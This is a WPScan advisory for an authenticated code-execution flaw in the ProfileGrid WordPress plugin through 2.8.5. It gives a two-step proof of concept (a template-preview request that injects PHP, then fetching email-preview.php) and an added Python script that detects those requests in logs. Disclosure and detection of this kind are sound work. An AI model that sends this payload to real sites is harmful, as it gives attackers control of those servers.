ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution


Description
Versions of the ProfileGrid – User Profiles, Groups and Communities plugin prior to 2.8.6 are vulnerable to arbitrary code execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin.
Proof of Concept
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();

Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php
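
Added example, not part of the original advisory or the plugin's code: a Python check that flags the two requests from the proof of concept in recorded HTTP traffic. It assumes request bodies are available (for example from a WAF audit log); the function names, finding labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
PREVIEW_PATH = ("/wp-content/plugins/profilegrid-user-profiles-groups-and-communities"
                "/admin/partials/email-preview.php")
# PHP open tags: "<?php", "<?=" and the short "<?" form, but not "<?xml"
PHP_TAG = re.compile(r"<\?(?!xml)", re.IGNORECASE)

def classify(method, url, body=""):
    """Return a finding label for one HTTP request, or None if unremarkable."""
    parts = urlsplit(url)
    # endswith() also covers WordPress installed in a subdirectory
    if parts.path.endswith(PREVIEW_PATH):
        return "direct-preview-access"
    if not parts.path.endswith(AJAX_PATH):
        return None
    # action/html can arrive in the query string or in the form body
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    if "pm_template_preview" not in params.get("action", []):
        return None
    if any(PHP_TAG.search(value) for value in params.get("html", [])):
        return "template-preview-php-tag"
    return "template-preview-call"

def scan(requests):
    """Return (index, label) for every request that produces a finding."""
    hits = []
    for i, (method, url, body) in enumerate(requests):
        label = classify(method, url, body)
        if label:
            hits.append((i, label))
    return hits

# Constructed sample traffic (method, URL, form body); not real log data.
SAMPLE = [
    ("POST", AJAX_PATH, "action=heartbeat&interval=60"),
    ("POST", AJAX_PATH, "action=pm_template_preview&html=%3Cp%3EHello%3C%2Fp%3E"),
    ("POST", AJAX_PATH, "action=pm_template_preview&html=%3C%3Fphp+phpinfo%28%29%3B"),
    ("GET", PREVIEW_PATH, ""),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for index, label in scan(SAMPLE):
        print(index, label, SAMPLE[index][1])
```

A `template-preview-php-tag` hit followed by `direct-preview-access` from the same client matches the sequence in the proof of concept; on a site still running 2.8.5 or earlier, either one is worth reviewing alongside an upgrade to 2.8.6.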

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/1877071/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Submitter Twitter ripstech
Views 78
Verified No
WPVDB ID 9086

Timeline

Publicly Published 2018-05-18 (6 days ago)
Added 2018-05-18 (5 days ago)
Last Updated 2018-05-18 (5 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.